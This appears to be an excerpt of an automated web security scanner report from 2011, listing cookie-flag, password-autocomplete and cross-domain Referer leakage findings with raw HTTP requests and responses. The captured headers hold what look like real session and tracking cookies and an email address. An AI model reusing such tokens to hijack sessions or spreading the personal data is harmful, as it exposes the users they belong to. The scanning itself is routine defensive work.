HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Content-Language: en-US Date: Mon, 25 Apr 2011 23:44:11 GMT Location: http://ad.bizo.com/pixel?id=1258184&t=2 P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=55f5fe79-12b4-4f78-9976-61924d438e85; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/ Set-Cookie: BizoData=BiimYs2dCnnkYokR5LALIdNQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRwyz8QeClGZaj5XcunNcMDa7Re6IGD4lOgzJypdKRL6Ad6xyMUDLG7Ls3W4E4jF1liisFhqr12LzsIxjybldL0GQrQ8ohAZLAMaODe9cOOkiim9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzDeP3Y84mqpw8axzZEGMHjfOEhN8UMj4XaoP57SMbkTjDOsfxe0q98KOVcdy2PXFii1PU6e2biipKbWwErwOA1uvGg1WadM37je21ySjBqI9OZvePk1jYeANuipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6lnG4WL41W3AH0xNl7tETxisC5GEKyPhHoyiihEliiiihEZXwieie; Domain=.bizographics.com; Expires=Tue, 25-Oct-2011 11:44:11 GMT; Path=/ Content-Length: 0 Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cart/ HTTP/1.1 Host: www.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tracking202/redirect/pci.php?pci=535621131 HTTP/1.1 Host: www.directbrand.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: tracking202subid=3562113; tracking202subid_a_142=3562113
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tracking202/static/record.php?lpip=92317&t202id=&t202kw=&OVRAW=&OVKEY=&OVMTC=&c1=&c2=&c3=&c4=&target_passthrough=&keyword=&referer=http%3A%2F%2Fcleanallspyware.com%2FSpam&resolution=1920x1200&language=en HTTP/1.1 Host: www.directbrand.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_us/about-first-data/media/press-releases/04_11_11 HTTP/1.1 Host: www.firstdata.com Proxy-Connection: keep-alive Referer: http://www.firstdata.com/en_us/home User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11%252526ot%25253DA%3B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en_us/about-first-data/media/press-releases/04_12_11 HTTP/1.1 Host: www.firstdata.com Proxy-Connection: keep-alive Referer: http://www.firstdata.com/en_us/home User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: countryCode=en_us; JSESSIONID=8B02942E5F37E07568A66BE00C61FBE6; __utmz=269008486.1303775197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269008486.510355525.1303775197.1303775197.1303775197.1; __utmc=269008486; __utmb=269008486.5.10.1303775197; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dfirstdataprod%253D%252526pid%25253Den_us%2525253Ahome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11%252526ot%25253DA%3B
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/login.aspx?sgt=1 HTTP/1.1 Host: www.fs.ustrust.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/aclk?sa=L&ai=CcAQr4Qa2TcXTNIratgfCkKVJ5YmV1AH98sm3Frf0p_McCAAQAigDUNKMvOH6_____wFgye6DiPCj7BKgAfOr8_4DyAEBqgQdT9CM_Hg02j2oGv29hhfq2HGVID_3pvdg4bTSf9I&val=ChAwNzcyYzlkNWVmMTNhYWFmENGWre0EGgjG9uMLiwzAayABKAAwj6b1wsnDmv3hATiKiMPtBECXkNftBA&sig=AGiWqtyX3h01gY39Flqfm3CJ24IuVs6FaA&adurl=http://www.tenable.com/services/nessus-perimeter-service HTTP/1.1 Host: www.googleadservices.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/contactUs.do HTTP/1.1 Host: www.is3.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA HTTP/1.1 Host: www.nuclearpesticide.com Proxy-Connection: keep-alive Referer: http://www.nuclearpesticide.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: parkinglot=1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /download/pchealthadvisor/revenuewire/ HTTP/1.1 Host: www.paretologic.com Proxy-Connection: keep-alive Referer: http://www.cleanallspyware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://dl3.paretologic.com/webair/dl3/downloads/pchealthadvisor/en/ParetoLogic%20PC%20Health%2 ...[SNIP]...
16. Password field with autocomplete enabledpreviousnext There are 30 instances of this issue:
The page contains a form with the following action URL:
https://edit.yahoo.com/registration
The form contains the following password fields with autocomplete enabled:
password
passwordconfirm
Request
GET /registration?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1 Host: edit.yahoo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=8rcxbXg95hel0MytgTDr_2B2BVW0jVQ7tmPJEs0j5AdXZUbybwmQZsK068tjIvf6fYYxCmH8sgZKRD4nnaFbjRWnNh0tzBZZPI2TlrRCtwN9ysEBdYbFFQazweu3F.kqY7kl94s5Eq0mFfPFH2RWxS14zsQgGNEiePX.qwRuZSNYyhi7khtbCFI_IZp1LMsy.3gF5Dxxjeow9Zm6fusz3hOtSDsrsaDHGtyrL2wQxmLtoE4J7ppVLywJKGUp10gymzlZvt3Bo.2oy9nEuAfWDpwmnabn81GNWisNd11D_e6WMQs2naRzFa8WRHeyvGOQCFHb0wWqVdFG3Vxq9Heb_LiLJRAPFTAGEtpHyk7jX.8lnein3dyeJIbqpiXqw3HvQ3OE8Za3L6TkP49RDB4lIF2cj1T2LGB2M.ZV450VG0Ck7IqiOovO94EXpPikk207OLESF0yStMJphO8GChEL3kZP
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:40 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Connection: close Content-Type: text/html Content-Length: 52925
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The page contains a form with the following action URL:
https://login.yahoo.com/config/login?
The form contains the following password field with autocomplete enabled:
passwd
Request
GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1 Host: login.yahoo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:55:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 42663
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... </legend>
<html> <head> <title>Net-Address UK and international domain name registration including .com and .co.uk, with control panel management</title> <meta http-equiv="content-type" content="text/html; c ...[SNIP]... </p>
twitterCallback2([{"in_reply_to_user_id":61437533,"truncated":false,"text":"@sven_kr re: hosting - those R good choices but if u want high availability at the hardware level try vCloud Express by Virtacore","id_str":"60068578858254337","geo":null,"retweet_count":0,"favorited":false,"in_reply_to_screen_name":"sven_kr","source":"\u003Ca href=\"http:\/\/www.hootsuite.com\" rel=\"nofollow\"\u003EHootSuite\u003C\/a\u003E","created_at":"Mon Apr 18 19:53:59 +0000 2011","in_reply_to_status_id_str":"60061052318121984","contributors":null,"retweeted":false,"in_reply_to_user_id_str":"61437533","in_reply_to_status_id":60061052318121984,"user":{"friends_count":1289,"location":"Los Angeles, CA","id_str":"15181560","verified":false,"favourites_count":0,"profile_text_color":"333333","description":"Don't be a server hugger. Hug the Cloud is for discovering the expanding worlds of Cloud Computing and SaaS. Fueled by @IKANO, a Google Apps Partner.","contributors_enabled":false,"notifications":null,"profile_sidebar_fill_color":"DDEEF6","default_profile_image":false,"default_profile":true,"following":null,"profile_background_tile":false,"created_at":"Fri Jun 20 16:33:13 +0000 2008","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/131169860\/hc_normal.png","time_zone":"Mountain Time (US & Canada)","profile_link_color":"0084B4","follow_request_sent":null,"profile_sidebar_border_co ...[SNIP]...
Request 2
GET /statuses/user_timeline/hugthecloud.json?callback=twitterCallback2&count=5 HTTP/1.1 Host: twitter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2
twitterCallback2([{"in_reply_to_user_id":61437533,"truncated":false,"text":"@sven_kr re: hosting - those R good choices but if u want high availability at the hardware level try vCloud Express by Virtacore","id_str":"60068578858254337","geo":null,"retweet_count":0,"favorited":false,"in_reply_to_screen_name":"sven_kr","source":"\u003Ca href=\"http:\/\/www.hootsuite.com\" rel=\"nofollow\"\u003EHootSuite\u003C\/a\u003E","created_at":"Mon Apr 18 19:53:59 +0000 2011","in_reply_to_status_id_str":"60061052318121984","contributors":null,"retweeted":false,"in_reply_to_user_id_str":"61437533","in_reply_to_status_id":60061052318121984,"user":{"friends_count":1289,"location":"Los Angeles, CA","id_str":"15181560","verified":false,"favourites_count":0,"profile_text_color":"333333","description":"Don't be a server hugger. Hug the Cloud is for discovering the expanding worlds of Cloud Computing and SaaS. Fueled by @IKANO, a Google Apps Partner.","contributors_enabled":false,"notifications":null,"profile_sidebar_fill_color":"DDEEF6","default_profile_image":false,"default_profile":true,"following":null,"profile_background_tile":false,"created_at":"Fri Jun 20 16:33:13 +0000 2008","profile_image_url":"http:\/\/a1.twimg.com\/profile_images\/131169860\/hc_normal.png","time_zone":"Mountain Time (US & Canada)","profile_link_color":"0084B4","follow_request_sent":null,"profile_sidebar_border_color":"C0DEED","followers_count":1163,"screen_name":"hugthecloud","show_all_inline_media ...[SNIP]...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.backbonesecurity.com/interior.cfm?itemCategory=39808&siteid=418&pr ...[SNIP]... <!-- Plaintext email form for now --> <form action="http://lakefloyd.com/backbone/Protected/mailform.cfm" method="post" name="ContactForm"> <input type ="hidden" NAME="sendto" VALUE="jeff@aagg.com"> ...[SNIP]...
20. Cross-domain Referer leakagepreviousnext There are 60 instances of this issue:
GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset=UTF-8 Content-Length: 3896 Date: Tue, 26 Apr 2011 14:21:07 GMT
<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script> ...[SNIP]... </div> <script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf"></script> <noscript> <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf" height="300" width="500" frameborder="0"></iframe> ...[SNIP]... <td width="100%"><iframe name="check_frame" width="318" height="199" src="http://www.spruzme.com/files/apps/geolocator/frame.asp" style="display:none;"> Your browser does not support inline frames or is currently configured not to display inline frames. </iframe> ...[SNIP]...
GET /registration?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1 Host: edit.yahoo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=8rcxbXg95hel0MytgTDr_2B2BVW0jVQ7tmPJEs0j5AdXZUbybwmQZsK068tjIvf6fYYxCmH8sgZKRD4nnaFbjRWnNh0tzBZZPI2TlrRCtwN9ysEBdYbFFQazweu3F.kqY7kl94s5Eq0mFfPFH2RWxS14zsQgGNEiePX.qwRuZSNYyhi7khtbCFI_IZp1LMsy.3gF5Dxxjeow9Zm6fusz3hOtSDsrsaDHGtyrL2wQxmLtoE4J7ppVLywJKGUp10gymzlZvt3Bo.2oy9nEuAfWDpwmnabn81GNWisNd11D_e6WMQs2naRzFa8WRHeyvGOQCFHb0wWqVdFG3Vxq9Heb_LiLJRAPFTAGEtpHyk7jX.8lnein3dyeJIbqpiXqw3HvQ3OE8Za3L6TkP49RDB4lIF2cj1T2LGB2M.ZV450VG0Ck7IqiOovO94EXpPikk207OLESF0yStMJphO8GChEL3kZP
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:56:40 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Connection: close Content-Type: text/html Content-Length: 52925
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
GET /landing.php?d=freemarker.com HTTP/1.1 Host: freemarker.com Proxy-Connection: keep-alive Referer: http://freemarker.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sid=i7s9s5sueqcrhpr4chuavarau2
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE" Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 13:03:55 GMT Server: lighttpd Content-Length: 20955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>freemar ...[SNIP]... <td class="title2">
<a href="http://domainbrokers.com/index.php?page=offer&domain=freemarker.com" target="_blank">Click here to make an offer on this domain name</a> ...[SNIP]...
